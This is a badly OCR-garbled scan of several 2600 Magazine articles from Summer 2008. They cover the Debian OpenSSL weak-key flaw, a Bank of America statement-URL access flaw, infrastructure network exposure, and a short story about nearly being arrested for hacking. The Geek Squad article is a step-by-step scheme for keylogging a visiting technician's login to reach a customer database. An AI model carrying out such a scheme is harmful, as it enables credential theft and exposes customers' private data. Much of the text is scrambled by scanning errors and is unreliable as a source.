keeps track of these sources, and adds the
entropy to the system-wi de random pool ,
but dur i ng i nt i al i zati on, OpenSSL must add
the entropy to i ts own sources.
I nstead of seedi ng the random number
stream from the process 1 0 and the system
wi de entropy pool , the cr i ppl ed OpenSSL
PRNG (pseudo-random number generator)
uses onl y the process 1 0, on L i nux fal l i ng
between 1 and 32, 767, meani ng i nstead of
2A1 2 8 (the mi ni mum amount of entropy
OpenSSL expects) poss i bi I i t i es - northwards
of an undeci l i on (and yes I had to l ook on
wi ki pedi a for that) poss i bi l i t i es, there are
i nstead 2 A 1 5 possi bi l i ti es. Put another way,
i nstead of needi ng 3 . 7 x l OA32 gi gabytes
to store every poss i bl e SSH host key, it now
takes about 40 megabytes per hardware
pl atform ( I ntel 32bi t, I ntel 64bi t, PowerPC,
etc. ) . Put a thi rd way, that's 1 . 9 x 1 0A-32
percent as many keys as there shou l d have
been. (And i f you remember your h i gh
school math that's 0. 0, thi rty-one zeroes,
1 9. I t's actual l y hard to represent these
numbers i n t hi s arti cl e - they're so sma i L)
Not onl y have the total number of
possi bl e keys been drasti cal l y reduced,
but a key i s now much more predi ctabl e
dependi ng on when i t was generated,
as noted by H. D. Moore. Many servi ces
generate thei r keys dur i ng i nsta l l , meani ng
the process 1 0 of the i nstal l er is l i kel y to
fa l l wi thi n a predi ctabl e range.
The si gni fi cantl y reduced total key space
makes br ute force attacks agai nst user
l ogi ns and i mpersonati on of servers tri vi al .
Performi ng a man- i n-the-mi ddl e attack
(over, for exampl e, a wi rel ess network)
becomes as si mpl e as fi ngerpr i nt i ng the
publ i c key of the host and provi di ng the
pr i vate key from the tabl e of pre-cal cul ated
keys. No a l ert i s rai sed that the host key
has changed, and the cl i ent conti nues as
normal .
Admi ni strators of systems where a user
has upl oaded an SSH user key are al so
Pa
g
e 52
2600 Ma
g
azine
vu l nerabl e, even when the system i tsel f system. Agai n, th i s i ncl udes SSH a nd any
does not use a vul nerabl e OpenSSL l i brary. servi ce us i ng SSL, such as HTTPS, t he very
Si nce SSH user keys cover a s i mi l ar l y sma l l traff i c conta i n i ng sens i ti ve i nfor mati on
key space, brute forci ng a user i s onl y a you encrypted to protect i n t he f i rst pl ace.
matter of t i me. Most SSH servers a l l ow The random seed i s used i n t he PRNG to
seven attempts per con necti on, mea n i ng generate per-sess i on symmetr i c encryp
the average search a rea for match i ng the ti on keys, wh i ch a re faster a nd requ i re l ess
user's key i s j ust over 2000 connect i ons resou rces t o encrypt data t han t he publ i c
( 32, 768 di vi ded by two s i nce on average a key method used to i denti fy a server. How
key wi l l be found i n h a l f of the search a rea, easy cou l d i t be to crack saved SSL sess i ons?
di vi ded by seven attempts per connecti on). I n 1 996, Netscape used a weak PRNG seed
I f the attacker has access to the user' s publ i c (a hash of the ti me, process 1 0, a nd parent
key (vi a a web page, control of another process 1 0) wh i ch cou l d generate, at best,
server where the user has upl oaded a key, a seed of 47 bi ts ( 2"47 poss i bi l i ti es). I an
etc.), then match i ng i t becomes a matter of Gol dberg a nd Davi d Wagner, students at
s i mpl y match i ng t he precomputed keys. Berkel ey, wrote a br ute-force attack wh i ch
Si nce the process 1 0 of the SSH-keygen cou l d break an SSL sess i on i n 2 5 seconds.
process i s moderatel y guessabl e, the search Us i ng 1 996 l evel hardware, they were abl e
a rea can be nar rowed even fu rther, maki ng to break the SSL sess i ons, wi t hout knowi ng
br ute forci ng users wi t h vu l nerabl e keys the keys, of a seed wi th fou r bi l l i on t i mes
even easi er. more entropy t han the weakened OpenSSL
H.D. Moore has precomputed the SSH seed. SSH wi l l l i kel y show s i mi l a r ti mes,
host and user keys for severa l pl atforms, especi a l l y when the keys t hemsel ves a re
ava i l abl e at ht tp : / / met as pl oi t . com/ guessabl e.
-us ers / hdm/ tool s / debi an- opens s l / How does someth i ng l i ke th i s happen?
Th i s f l aw affects every appl i cat i on wh i ch Most l i kel y, a combi nat i on of good
uses OpenSSL, a nd is especi a l l y i ns i di ous i ntenti ons, i gnora nce, a nd l ack of vi gi
because i t i ntroduces a persi stent, perma- l ance. Typi cal l y, readi ng from u n i n i t i al
nent vu l nera bi l i ty wh i ch does not go away i zed memory i s a bad th i ng - i t wi l l have
s i mpl y by upgradi ng the affected l i brar y. unpredi ctabl e res ul ts si nce t he va l ue i s
Any appl i cati on wh i ch stores a key gener- u n known. When seedi ng a pool of random
ated by the vu l nerabl e l i brary wi l l cont i nue data, readi ng from u n i n i t i a l i zed memory i s
t o be vul nerabl e: OpenSSH, OpenVPN, at worst usel ess - t he memory conta i ns a l l
Apache, I map-SSL, Bi nd, SSH cl i ents, zeroes - a nd at best a nother source of semi
some hard dr i ve encrypt i on schemes such random data to be combi ned i nto t he pool .
as ends, a nd any other SSL based appl i ca- I nstead of f i xi ng the i n i t i al seed of u n i n i t i al
t i on, must regenerate t he keys and noti fy i zed memory, the devel oper commented
users that the keys a nd certi f i cates have out the l i ne wh i ch used the u n i n i t i a l i zed
changed. Al l SSH RSA user keys generated memory where the fu nct i on adds the i nput
on a weakened system must be repl aced to the entropy pool . By fa l l i ng i nto a rote
on every system they have been copi ed to. f i xi ng patter n where the goa l was to el i mi
Al l SSH OSA user keys used on a weak- nate war ni ngs from Pur i fy, rather t han to
ened system must be repl aced - even if u nderstand the code and how i t was used,
they were generated pr i or to the weak- a s i mpl e mi stake became an enor mous
ness - due t o a f l aw i n the OSA mechan i s m f l aw. Lack of commun i ty vi gi l ance i n spot
that revea l s the pr i vate key i f an attacker ti ng th i s change dur i ng test i ng a l l owed i t
captu res mu l ti pl e uses of the same crypto- i nto the mai n codebase.
graphi c nonce, wh i ch is generated by the Someth i ng of th i s magni tude wi l l l i kel y
s ame f l awed PRNG. happen aga i n, though hopefu l l y not for
Addi t i on a l l y, any encrypted traff i c some ti me, due to the publ i ci ty t hi s expo
exchanged from or to a weakened system i s s ure has gotten. The onl y sol ut i on i s to
now vu l nerabl e to attack - even i f the keys be vi gi l ant about what i s modi f i ed and
used predate the vul nera bi l i ty - i ncl udi ng i nsta l l ed. Mon i tor cri ti ca l packages for
any traff i c performed over the past two modi f i cati ons, contr i bute to a udi t i ng on
years wh i ch mi ght have been l ogged by your favor i te di str i but i on, a nd don' t mess
a nyone between you a nd the affected wi th random number generators.
Summer 2008 Pa
g
e 53
THE GEEK
SQUAD
by Turgon al l y mil l ions of customers. Addresses, phone
numbers, and email addresses are just the begin-
Ahh, the Geek Squad: l ove them or hate them, ning. Most Agents, as per corporate pol icy, al so
t hey' re here to stay. Best Buy' s computer "task l og copious notes of every customer ' s WPA or
force" can be found in every store, at your home WEP key, SSI D, I P address, PC make and model ,
or office, or on t he road i n their bl ack and white OS, RAM amount, viruses found, and l ots more.
VW beet l es. The Geek Squad database contains information
A majority of their empl oyees, who are known not onl y about individual s but al so about their
as Agents, are high school kids with a basic under- numerous smal l business cl ients.
standing of Windows Vista and XP, but more than Note that Agents are required to reset their
a few of them real l y know their stuff. Some even STS passwords on a regu l ar basis, and a hacked
read and contribute to 2600 Magazine. password is easi l y reset by corporate. Therefore,
What is this articl e about? Wel l , it isn' t a rant having an Agent ' s l ogin credential s is onl y good
about incompetence. Sorry, guys and gal s, but for information gathering; once an Agent real izes
you can find pl enty of that on consumeri s t . com that his password has been changed, he' l l have
or on count l ess forums. No, what I am here to it reset in minutes. There' s no easy way for an
tal k about i s a tiny security issue with huge conse- Agent to know if an account is being abused, as
quences. Here' s how to wreak havoc in five easy it ' s possibl e to l ogin from mul tipl e computers or
steps. browsers at the same time. One coul d theoreti-
First Step: Cal l the Geek Squad at cal l y have unfettered access for months before the
1 -800-433-5778 and set up an appointment for Agent is forced to change the password at a server
a wirel ess network security insta l l . This is their prompt.
cheapest and quickest service. Unfort unatel y, it Agents are usual l y cl ever enough to find
wil l cost you $59; as we' l l see l ater, though, this is keyl oggers if they are performing virus removal s,
a sma l l price to pay for such a prize. system optimizations or upgrades, and simi l ar
Second Step: I nsta l l a keyl ogger on your jobs. The simpl e fact t hat they' re onl y out to
l aptop or desktop computer. Software, hardware, encrypt your wirel ess router means they won ' t
doesn ' t matter. even look twice to check background programs
Third Step: Reset your wirel ess router settings or physical l y examine the machine and inspect
to the defaul ts: disabl e WEP and WPA, and use for hardware l oggers.
the defaul t 5SI D. Then, sit back and wait for your Best Buy l ikes t o cut corners, and its empl oyees
appointment. A fiel d tech, who we' l l cal l Doubl e and customers are al ways get t he short end of the
Agent, wil l show up dt your door. He or she wil l stick. A workabl e sol ution to the security issue I
tl ke a l ook at your situation and secure your have discussed wou l d be for Best Buy t o provide
router with WPA: piece of cake! Thank the agent a l aptop to its Agents for on-site use. Companies
for their amazing WPA-typing skil l s and reject any l ike HP, Toshiba, or Cateway wou l d probabl y
other ,ldditional services which they mdY try to even spl it the cost to have these " respected"
"up-sel l . " Ceek Squad Agents toting their brand' s l aptop
Fourth Step: Your hero Doubl e Agent wil l now into impressionabl e customers ' homes . Other
sit down at your computer, open a web browser, prevpntion techniques that Best Buy might
and go to ' . | . . ( | . | i1 employ i ncl ude a server-side upgrade requiring a
Once there, t h(y wil l t ype in their l ogin creden- Secu r l D token for dccess to STS or l imiting l owl y
tic l s. The usemime wil l be something l ikl 1 2 3456; Agents ' dccess t o t he huge database of customer
t he password wil l be H case-sensitive combinl - information.
tion of l etters dnd numbers. The Agent wil l pul l For a company dt t he cutting edge of new
up your name .l Ild ,l (cou nt on the Ceek Squad technol ogy, Best Buy is setting their Ceek Squdd
system, which is cal l ed "ST5" and which is abl (' to brand up for m,lj or troubl e There' s huge risk that
take credit cards via a shopping Clft feat ure, print any of their over 2000 fiel d agents might enter
receipts, add charges, remove chargeS, and so on . their credential s into a compromised computer.
Your receipt wil l print out, and the Agent wil l l og There' s al so the risk of abuse. At al l times, any
out and cl ose the browser. Agent, Best Buy manager, or cal l center phone
Fifth Step: With t he agent gone, you shou l d first jockey hds access to an extravagant amount of
change your WPA key to something el se. You ' ve customer data. I am no whist l e bl ower or disgrun-
now got the Agent ' s STS login and password. t i ed empl oyee, but corporations l ike Best Buy are
Thanks to your kf'yl ogger, you now have reactionary. They onl y act on beh,l f of customers
l ogin credentia l s for 5T5, giving you access to or empl oyees when they get in troubl e. When al l
Ceek Squad' s entire customer database of l iter- ot her methods fai l , I t urn to the community!
Pa
g
e 54
2600 Ma
g
azine
Ban k of Ameri ca Websi te Fl aw Al l ows
Readi ng of Other Customers' Statements
by mal pel o93@gmai l . com
There is a security fl aw in Rank of Ameri
ca ' s website which al l ows any Rank of America
customer to view another customer ' s credit card
statements under certain circumstances. Bank of
America was notified of this security issue in a
l etter, but they repl ied that they are unwil l ing to
change their website, and the security hol e stil l
exists as of the writing of this articl e.
Onl y Bank of America credit card hol ders,
not deposit account hol ders, are affected by this
security hol e. The fl aw rel ies on two things: first,
the section of the bank' s website that displ ays
customer statements retrieves the statements by
using an unencrypted URL containing the fu l l
credit card account number. Second, the same
URL used to retrieve one customer ' s statement
can be used by another Bank of America customer
to view that same statement and others from the
first customer ' s account.
The URL for viewing a statement in the "state
ments" section of the Bank of America website is
constructed as fol l ows:
ht tps : / / ccs s . bankof amcri ca . com/NASApp/
-Bo fAce / Get fs ta tcmen t , doc 1d = 9 U5 4XXXXXX
-XXXXXXXXSTATFMENTSDocumcntArch i vc$
-9 0 5 4 XXXXXXXXXXXXXXO I I 0 2 1 1 8 0 1 4 6 &
-docDatc= 0 0 8 0 0 1 0 &docTypc= PDJ&
%lssuer- 9 0 ,down oad= fa | so
The " 5 4 XXXXXXXXXXXXXX" kept in the web
browser ' s history, where it can be seen by future
users of the same computer. This is where the
abil ity to read other customers ' statements comes
into pl ay.
Ry copying the above LJ RL t o t he cl ipbocmJ,
then l ogging in to a R,mk of America account for
which one has a l egitimate l ogin and password,
one is abl e to paste the LJ RL into the browser
address bar. The statement wil l then be pul l ed
from the server without any val idation of which
customer is l ogged in at the time. Conceivabl y,
an attacker cou l d put any val id Bank of America
credit card number into the LJ RL and pu l l t hat
customer ' s statement; however, he woul d need
to al so have the correct statement date ( shown
as 01 1 02008 and 2008-00- 1 0 in the above LJ RL)
as wel l as the j-digit random number at the end
of the acccount number and date code, which is
346 in the above exampl e. The issuer code, 90,
which is put in from of the account number, does
not seem to change, al though this has onl y been
verified with a handfu l of personal and famil y
accounts which this writer has tested. I t woul d
be possibl e t o guess t he 3-digit random code
after enough tries. I f an attacker al ready has the
actual URL from a customer, however, then he
can simpl y use that URL, since the 3-digit code
appears to be assigned to the statement and not to
the l ogin session.
The fact t hat the fu l l account number is stored
and transmitted so cl earl y was reported to Bank of
America about six months ago. Their repl y stated,
"The account number on your computer ' s URL is
ineffective without the security code and expira
tion date that is printed onl y on your credit car(L
Rank of America monitors the accounts on a dail y
basis t o protect you from fraud . . . You are not hel d
l iabl e for fraudul ent use of the account. Due to
system constraints, we are unabl e to remove the
account number from your LJ RL fiel d."
I t woul d seem that Bank of America does
not care about the privacy or security of their
customers ' credit card statements enough to fix
this critical fl aw in their website.
AOLAS1 |K ALL1H L WKLO
Wed nesdays, 1 900- 2000 ET,
WBAI 99 . 5 FM, New York Ci ty
nd at http : //www. 2600. com/offthehook over

`
us d u ri ng t he show at + 1 2 1 2 209 2900.
Emai l oth @2600 . com wi th you r comments .
Pa
g
e 55
WiY IS
-
ilS

f
M'I
-
1

f-
P -f -l
I /
-?
by Porter Pyne
ment PCs, and anti vi rus management servers.
Of course, si nce I T managers have l ower
I was l i sten i ng to a recent edi t i on of 2600' s
eth i cs t han the average th i rd-wor l d di ctator, we
weekl y audi o program Of The Hook, and I
must al so be abl e to mon i tor the usage of each
heard the host, Emmanuel Gol dstei n, aski ng the
pc, i ncl udi ng any web brows i ng that mi ght be
quest i on, "Why does th i s computer need to be
done from that Pc. The fact that mon i tor i ng
connected t o the i nternet?"
an empl oyee' s web browsi ng i s tantamount to
Ah. An excel l ent questi on, and one that i s
menta l rape i s not an i ssue. I n the Uni ted States
more compl i cated and convol uted t han one
and some other countri es, anyth i ng done on
mi ght th i n k at fi rst.
busi ness computers i s subj ect to mon i tor i ng by
I used to work at an unnamed el ectri ca l
the IT department. You have no r i ghts to pri vacy
uti l i ty. Much of my experi ence comes from t hat
on wor k computers, peri od. Whet her t hi s i s ri ght
and from previ ous work experi ence as a network
or wrong i s i mmater i al ; i t i s the l aw.
admi ni strator and engi neer.
Because of a l l t hi s, computers that have no
So, why are computers that seemi ngl y have
busi ness bei ng on I nternet-con nected networks
no need for i nternet access connected to the
qu i te i nevi tabl y end up on t hem.
i nternet ?
Most peopl e woul d be sur pr i sed t o know that
The short answer: Lazi ness and expedi ency.
el ectr i cal gr i ds, water di st r i but i on systems, and
Even as a secur i ty-consci ous network admi n-
many other cr i ti ca l i nfrastructure el ements are
i strator, I was i nevi tabl y confronted wi th si tua-
connected, one way or another, to the i nternet.
t i ons l i ke thi s one: Someone wou l d tel l me, "We
If they aren't connected to the i nternet, they are
have th i s computer that needs to pr i nt l abel s for
connected to modems for di al - i n access. Because
vi si tors to the uti l i ty."
of modems' l ow bandwi dth, we are seei ng l ower
"Ok, " I ' d t hi nk. "Sounds l i ke a standal one
uti l i zati on of modems as t i me goes on. Sh i vas
appl i cat i on. "
and ot her RAS devi ces have al l but dr i ed up, as
Then, I ' d be tol d, "We woul d al so l i ke to be
the appl i cati ons that used to requi re modems are
abl e to mai ntai n a l i st of vi si tors, " and sudden l y
now uti l i zi ng i nternet connect i vi ty.
the system needed to have a database. Yes, i t i s i ndeed poss i bl e to breach these
Fi nal l y, I ' d be asked, "Cou l d we al so have
systems wi t h root ki ts, buffer overfl ows, or other
access to that database from other l ocati ons on t r i cks of the trade; to i nsta l l VNC or other remote
the LAN and publ i s h the i nformati on on the access software and thus open and cl ose fl ood-
i nterna I web server?" Th i s means that I ' d need to gates or ga i n control of el ectri ca I gri ds; to com pro-
gi ve the system network access and easy access mi se medi cal computers wi th di agnosti c i mages;
for anyone, especi al l y an i ntruder. or to do other terri fyi ng t hi ngs. The potenti al for
Because network access al so i nevi tabl y mas s mayhem and massi ve l oss of l i fe cannot be
means i nternet access, we now have t he prover- overstated. The Uni ted States and many other
bi al hi ghway to hel l . Th i s mach i ne coul d have countri es have a t i ck i ng t i me bomb of massi ve
been standal one, if onl y the corporate manage- proport i ons wi th i n the I T i nfrastructure they have
ment ni twi ts had al l owed i t to be that way. grown addi cted to havi ng access to.
Other reasons for connect i ng machi nes to To date, I have not seen ,ny maj or catastro-
a network i ncl ude access to network pr i nters; phes rel ated to computer i nt r usi ons. By maj or
access to the machi ne for management reasons catastrophes, I mean events that wou l d make
such remote access or support, ant i vi rus updates, nat ural catastrophes l i ke Katr i na, earthquakes,
and the l i ke; or the need for the computer to be and tsunami s seer smd l l . I attri bute t hi s to
abl e to access or store fi l es on fi l e servers. i ncredi bl y good l uck and to the bet that the
So, beGlUSe I nformati on Tech nol ogy depart- peopl e thai w,mi t o har r us have noi speni any
ments are poor l y managed, and workers and si gn i fi cant effort, or they have not had the mental
adrn i ni strators al ready have an overabundance of acu i ty || percei ve the poss i bi l i ty of what they
dai l y work and art i fi ci al and rea l I T emergellci es,
cou l d accompl i s h.
i t i s expedi ent t o be abl e t o access al l computers,
Even though better secur i ty i s al ways an
workstat i ons, pr i nters, al arm systems, and so forth
opt i on, budgetary reasons usua l l y prevent i t from
fre' ' net"' Nk management consol es, I T depart-
bei ng pursued. VLANs do not orovi de substan-
Pa
g
e 56
2600 Ma
g
azine
t i ve secur i ty, as swi tch secur i ty is usual l y ques
t i onabl e. SNMP i s a secur i ty n i ghtmare, and
most swi tches i n use can be compromi sed wi t h
the typi cal publ i c and pr i vate SNMP commun i ty
stri ngs. VLANs and swi tch port assi gnments can
then be reass i gned rather eas i l y. So, i f VLANs
are not the answer, are separate networks a
poss i bi l i ty?
Somet i mes. But you know what happens.
I nevi t abl y there i s some "busi ness need, " usual l y
i magi nary, that necessi tates the connecti on of the
secure network to the mai n producti on, i nternet
accessi bl e network, t hus maki ng the "secure
network" i nsecure. The connecti on of secure to
producti on networks can be done t hrough a fi re
wal l , but t hi s is sti l l substant i al l y less secure t han
" not connected. " The l amentati ons and death
gasps of the networ k admi n i strator are for naught;
i f somethi ng can be connected wi th copper or
fi ber, i t wi l l eventual l y be connected.
Onl y i n rare cases, i n compani es or govern
ment organi zat i ons that have some grasp of secu
r i ty, do we end up wi th computer faci l i t i es that
are secure from the i nternet. Thi s i s the excepti on
rather t han the nor m.
I n Bruce Wi l l i s ' s movi e Live Free or Die Hard,
Bruce Wi l l i s and the ki d hacker have to phys i
cal l y go t o el ectr i cal transmi ssi on and generat i on
centers to get access to the power gri ds. Thi s,
unfortunatel y, i s wi shfu l th i nk i ng.
The i nnocent questi on posed by the orr
The Hook host has very real and demonstrabl y
dangerous rami fi cati ons t hat are preval ent
t hroughout the i nfrastructure of t he Uni ted States
and the wor l d.
The best answer for why a computer i s
connected t o the i nternet i s because i t can be
done.
The way to mi t i gate t hi s probl em i s t o have
good secur i ty personnel that are a l l owed to
perform t hei r j obs. Th i s means havi ng a secur i ty
pol i cy that is adhered to us i ng secur i ty devi ces
that provi de a s i gn i fi cant l evel of l ayered secu
ri ty, usi ng secur i ty devi ces t hat are themsel ves
secure, us i ng appl i cati ons and operati ng systems
that are secure, and havi ng secure vi rus protec
t i on, whi ch may in fact not be poss i bl e. The best
secur i ty pol i cy for any mach i ne i s for i t to have
no network connecti on, no modem, no soft
ware updates, and no ant i vi rus software, and for
a l l i nput to be entered by a l i ttl e ol d l ady from
Kentucky. Why no ant i vi rus software? Because,
as some of my referenced mater i al and other
i nternet-accessi bl e mater i al poi nt out, ant i vi rus
software i s rampant wi t h i nsecure codi ng that
can i tsel f be an attack vector for compromi s i ng a
computer. So, scan the machi ne wi t h an ant i vi r us
program when i t i s set up, but don ' t i nsta l l any
anti vi rus software. I ndeed, after the i n i t i al i nstal l ,
don't i nsta l l any addi t i onal software. I f i t works,
don't fi x i t; i f i t ' s secure, don ' t booger i t up or
ri sk a vi rus i nfecti on by addi ng new software.
Remove t he fl oppy dr i ve, and put gl ue from a
gl ue gun i nto the network, modem, and USB
ports. Why t he I i ttl e ol d l ady from Kentucky? She
does n' t f i t t he hacker profi l e, but are we real l y
sure about her? I th i nk I saw a copy of 2600 and
a Phrack pri ntout i nsi de her handbag, al ong wi t h
a USB t humbdri ve l abel ed "root ki ts. "
Some of these secur i ty measures are not
wi th i n t he grasp of some busi ness envi ronments,
but some of them are poss i bl e, wi t h the most
fundamental and most cr i t i cal pi ece bei ng the
secur i ty pol i cy.
What is the best reci pe for a good secur i ty
pol i cy? That is the topi c for another art i cl e.
Even i f the enti ty respons i bl e for mai n
tai n i ng t hat gri d uses someth i ng approach i ng a
reasonabl e secur i ty pol i cy, they are connected,
presumabl y over a secure network (yeah, r i ght) ,
to computers mai nta i n i ng downstream di stri bu
ti on gr i ds t hat are not as secure. You are onl y as
secure as t he weakest l i n k i n your armor, and
smal l er di str i but i on gr i ds are the Ach i l l es' heel
of el ectr i cal gri d secur i ty. Rel ated to t hi s, SCADA
(System Control And Data Acqu i si t i on) , whi ch
i s used t o control el ectri cal and hydro faci l i t i es,
has i ts own set of secur i ty probl ems. A faci l i ty i n
I daho, mai ntai ned by t he Department of Energy,
performs research i nto cybersecuri ty i ssues that
pertai n to SCADA systems. They perform demon
strati ons for i nterested, Government-approved
parti es to show how SCADA systems can become
compromi sed.
References
A concentrated attack on SCADA, EMS,
"Anti -vi rus protecti on gets worse,"
tel ephone, traffi c control , E91 1 , and I nternet
h t t p : / / www . channe l r e g i s t e r . c o . uk /
2 0 0 7 / 1 2 / 2 1 / dw i n d l i ng_an t i v i r u s
servi ces i s the current-day cyber-armageddon .
-prot ect ionl
I ndustry representati ves rant t hat such a scenar i o
"Uni x admi n tri ed t o axe power gri d, "
i s beyond the bounds of poss i bi l i ty, but we know h t tp : / / www . i n f owor l d . c om / c g i. - b i n /
better, don't we?
r e di I e c t ? s o u r c e rs s & u r l
=
h t lp : 1 /
I won' t spel l out, anymore than I al ready
www . i nf oworld . com/ ar t i c l e / 0 7 ! 1 2 ! 1 4 /
have, how such a n i ghtmare scenar i o cou l d be
Un i x - admi n - t r i e d - t o - ax e - powe r -
achi eved, but t he astute reader shoul d be abl e
gri. d_l . htrl
to read between the l i nes, to Googl e or Wi ki -
"Haxdoors of t he Kaspersky Anti vi rus 6/7, "
h t t p : / / r o o t k i t . c o m / n e w s r e a d
pedi a anythi ng they need to know more about,
. php? news i d
=
7 7
8
and to arri ve at a concl usi on s i mi l ar to mi ne. Al l
"Computers ' I nsecure Securi ty, "
of the typi cal attack vectors are i n pl ay: i nternet
h t t p : / / ww w . b u s i n e s s w e e k . c o m /
access, secur i ty vul nerabi l i ti es i n computers and t e c h n o l o g y / c o n t e n t / j u n 2 0 0 5 /
networks, and sari 'l engi neeri ng.
tc2 0 0 5 0 6 1 7_1 6 1 3_tc0 2 4 . htm
Summer 2008 Pa
g
e 57
by Peter Wrenshal l "I t' s none of my bus i ness, " I thought. But
as I say, i n those days I was fi xed on the i dea
I enj oy readi ng your magazi ne, and though of worki ng wi th computers, and i t wasn ' t l ong
am not a computer hacker or cracker, I before my cur i osi ty got the better of me. I went
thought you mi ght be i nterested to hear about i nto the offi ce, and crouched down to take a
how l ance nearl y got arrested for hack i ng and l ook. There was a manufacturer ' s decal on t he
ended up worki ng as a secur i ty consu l tant. front of the mach i ne but noth i ng el se. I l ooked
I t happened wh i l e I was cl er ki ng for one of around for some tag or l abel to tel l me what
the bi g haul age fi rms. The j ob i nvol ved traci ng mach i ne i t was and, more t o the poi nt, what
del i very trucks, photocopyi ng documents, and i t was doi ng al one i n a deserted room, but t he
del i veri ng mai l , even though t hi s was twenty mach i ne was as bare as the room i t was i n .
years after t h e experts announced t h e arri val A network cabl e came out of t h e back and
of the paperl ess offi ce. I t was hass l e from n i ne went i nto a socket on the wal l , so I fi gured
to five. From the fi rst day, I wanted to qu i t, but that the computer was sti l l i n use as part of
havi ng l eft school two years ear l i er at s i xteen, someone' s not-qui te-dead proj ect, or that i t
I di dn' t exactl y have many career choi ces. I had s i mpl y been forgotten about. The noi sy
was studyi ng at n i ght school to become a hard di s k whi rred, di ed, and then whi rred
computer networ k engi neer, but I was t hree igi i n, iS if t he mich i ne WiS doi ng some work
exams away from bei ng qUil i fi ed. i n the background, or had become stuck i n
The onl y good th i ng about the j ob was the i nfi n i te- l oop that 1 960s sci ence fi cti on
that I was free to wander around the enti re foretol d. I l ooked at the screen fi l l ed wi th
bui l di ng wi th the mai l cart. Wi th i n a few days error messages. Whatever program had been
of starti ng, I had found a deserted part of the run n i ng, i t had wel l and tru l y fal l en over, s i nce
bui l di ng, the east wi ng of the s i xth fl oor, where the command- l i ne was ava i l abl e, l eavi ng the
I cou l d go and s l ack off, and l ook down at a l l mach i ne tota l l y open.
the rat racers run n i ng t o and from t hei r i nter- The cursor bl i n ked at me, as i f t o say,
esti ng, hi gh-payi ng j obs. Even better, I cou l d " Pl eise hel p me, for I am broken. "
get some coursework done. I ' ve al ways l i ked computers, and they' ve
On the Fri day of my fi rst week, I hi d a pi l e al ways l i ked me, s o I was happy t o reboot t hi s
of study notes under a stack of mai l and rol l ed mach i ne to a l l ow i t to conti nue the l abors the
the mai l cart up to the s i xth fl oor. I wal ked past anci ents had set for i t. But fi rst I thought I ' d
the si gn showi ng what the spi ffy conference have a l i ttl e l ook, you know, j ust to see what
su i te they were bui l di ng up there woul d l ook operat i ng system i t was run n i ng.
l i ke when i t was fi n i shed, and I went i nto one Bendi ng l ow to type on the keyboard, I
of the empty offi ces. I opened my notes, and opened a few fi l es and soon found out the
started readi ng about I P versi on si x. I hadn' t mach i ne was run n i ng an ol d versi on of Li nux.
been studyi ng l ong when I noti ced a persi stent I was j ust consi der i ng whether I shou l d open
tappi ng sound. I l ooked around, but there was the password fi l e, to add my own user account,
noth i ng i n the room, whi ch was bare. There when I heard the voi ce of doom beh i nd me.
wasn ' t even any carpet. I went out i nto the "What are you doi ng?" i t demanded.
corri dor and peered i nto the offi ce next door. I typed the exi t command and hi t enter.
On the concrete fl oor, al most h i dden from After the screen had cl eared, I turned to see
vi ew, was an anci ent computer workstat i on, some guy i n hi s forti es, wear i ng overa l l s .
whi ch l ooked l i ke i t had been bui l t not l ong " Noth i ng, " I sai d, weakl y. I went t o l eave,
after the di nosaurs had di ed out. I cou l d see but he was a hefty guy, and he bl ocked the
that error messages had fi l l ed the screen. doorway. "Wai t there, " he sai d. He pul l ed out
Pa
g
e 58
2600 Ma
g
azine
a mobi l e phone and di al ed. " No, defi n i tel y not . I was j ust l ooki ng. "
"Hel l o? " he growl ed i nto the handset. To "Yes, but I don ' t get why wou l d you be
cut a l ong story short, the room soon fi l l ed i nterested i n it, anyway. What bus i ness is it of
wi t h peopl e, most of them wear i ng su i ts that your s? "
wou l d have taken a quarter of my year l y sal ary I shr ugged. " I wondered what had gone
to buy. The onl y one to i ntroduce h i msel f was wrong wi t h i t. The screen was ful l of errors. " I
Barker. He was, he sa i d, the IT manager. stopped tal ki ng, hopi ng that it was expl anati on
"Who are you, and what were you doi ng enough. When that di dn' t get any response
wi th that computer?" he sai d. from Bar ker, I conti nued.
" I ' m Karl Ri pl ey. I noti ced t he mach i ne had " I ' m tak i ng a n i ght-school course i n
crashed, " I repl i ed, avoi di ng any reference to computers, and there' s a troubl eshooti ng
my bei ng a mai l cl erk on my fi rst week. modul e. I t hought t hat I mi ght recogni ze t he
"Tamper i ng wi t h computers i s an offense. " errors. "
"Cri mi nal offense, " added t he admi n, j ust Barker l ooked around at t he s ui ts, to see
i n t i me for the arri vi ng securi ty guard to hear i t. how they took my expl anati on. Then he l ooked
There was a l u l l i n the cross- questi oni ng wh i l e me over, a n d I real i zed that he j ust wanted to
everybody seemed to be wai t i ng for me to get r i d of me. L i ke most IT managers, he prob
say someth i ng. A coupl e of Mi crosoft mi nutes abl y had twel ve hours of work to fi t i nto an
went by, but I cou l dn' t fi nd anyth i ng t o say. ei ght-hour workday.
My brai n was s l owl y fi l l i ng wi th i mages of me " Look, " he sai d, " I ' m goi ng to gi ve you the
push i ng a mai l cart around the Cedar Creek benefi t of t he doubt t hi s ti me, because i t' s you r
Federal Correct i onal Faci l i ty. I wondered what fi rst week here, and you obvi ousl y don ' t know
ki nd of j a i l t i me does hacki ng carri ed. the l ocal ru l es. B ut from now on, thi s sect i on
" I was n' t tamperi ng, j ust l ooki ng. I know I i s off- l i mi ts. And if you see any probl ems wi t h
shou l d have phoned t he hel pdesk, but i t ' s my any other computers, then do us a l l a favor and
fi rst week here, and I forgot the number. " Actu- j ust ri ng t he hel pdesk. Don ' t stand l ooki ng at
a l l y, I had never known i t. The onl y comput i ng the screen, because around here . . . "
that genera l cl erks were a l l owed to do was I fel t t he tensi on i n my body van i sh, and I
computi ng the square root of noth i ng. was j ust about to start breath i ng aga i n when
"Th i s ki d cou l d have been hacki ng, " the guy i n overal l s, t he one who had found
t he admi n sai d. " I t h i n k we shou l d cal l t he me, i nterrupted Barker.
pol i ce. " My stomach di d a somersau l t. Obvi - " I tol d you, he was n' t j ust l ooki ng at the
ousl y, th i s crufty- I ooki ng workstati on hel d screen, " he sai d. "He was typi ng on t he keys. "
some sort of commerci al data, l i ke the payrol l I ' d forgotten he was there. The whol e room
deta i l s for the l ast ten years or the fi l e on t umed to l ook at h i m, and Barker gl ared at
who won Offi ce Cl erk of the Month . I l ooked h i m, as i f he was annoyed at h i m for maki ng
around at t he crowd. Nobody obj ected t o t he a bi g deal out of noth i ng. The j an i tor gl ared
admi n ' s suggest i on. I saw the secu ri ty guard back. Maybe, I thought, he al so used t he s i xth
move s l i ght l y to hi s l eft, bl ocki ng t he exi t a fl oor for sl acki ng off or brewi ng moonsh i ne or
